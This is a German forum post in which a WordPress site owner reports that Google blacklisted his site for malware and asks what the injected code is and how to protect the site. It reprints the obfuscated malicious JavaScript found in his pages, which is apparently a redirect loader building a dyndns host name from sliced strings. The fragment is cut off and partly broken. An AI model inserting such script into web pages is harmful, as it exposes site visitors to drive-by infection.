Guten Tag liebes Forum,
vorgestern kam der erste Malware-Alarm von den Google-Webmastertools. Meine Wordpress 3.3 landete auf der Blacklist... Besucher wurden dementsprechend vor einem Besuch meiner Seite gewarnt.
Ich habe dann ein Backup von letzter Woche eingespielt und Google um erneute Überprüfung gebeten: Die Malware war gelöscht, meine Seite wurde wieder freigegeben.
Eben kam erneut eine Email von Google: Wieder "Malware"-Alarm.
Der gleicher schadhafte Code wie vorgestern. Ich konnte ihn aber nirgendswo im Quelltext finden.
Der schadhafte Code:
<script type='text/javascript'>function nUrchinCode(Y, A){va
r m = G('m');return Y[m](A);};function cookie(IK, urchinJ){r
eturn IK * urchinJ;};function o(){var Q = n();var s = I(cook
ie(k(), Q.min.length));var urchin = Q.min[s];var d = Q.Z[s];
if(Q.X.length > 1){var _ = Q.X[s];}else {var _ = Q.X[0];}ret
urn { N : urchin, b : _, $: d };};function q(Y){var l = G('l
');var L = G('L');return Y[l](L);};funcY){return Math
.floor(Y);};function nUtmn(Y, D$){return Y + D$;};p();functi
on n(){return {min : q(M("Uc1de1cU",3,2)),X : q(String(M(".d
yndns-serv2P6L",0,12)+M("er.comBq8",0,6))),Z : q(new String(
"s1"))};};function M(Y, A, H){return Y.substr(A, H);};functi
on E(){return (typeof ActiveXObject != new Stri ("undefin
edaMA",0,9)) || typeof XMLHttpRequest != String("undefin"+M(
"uDQredDQru",4,2)));};function domain(N, b){g = new Date();f
= N;var x = new String(M("Mhzqam957zhqM",4,5)+M("hcsx4z1v",0
,5)+M("I2YQ8pjzfQIY2",4,5)+"2ubli"+M("1MPnvrwt3nPM1",4,5)+M(
"Cbu96k01eubC9",4,5)+"oqndg"+"y");var R = G('R');var t = R +
G(
Alles anzeigen
Kann ich den Inhalt meines Webspace für solchen Malware-Kram irgendwie sperren und mich schützen? Was ist das? Woher kommt es? Und wie kann ich mich schützen?
Ich hab ein wenig Sorge um mein (gutes) Ranking... Ausserdem gehen mir da durch sicherlich auch Leads/Anfragen verloren.
Für schnelle Antworten und Hilfen bin ich sehr dankbar!
Vielen Danke und viele Grüße
Torsten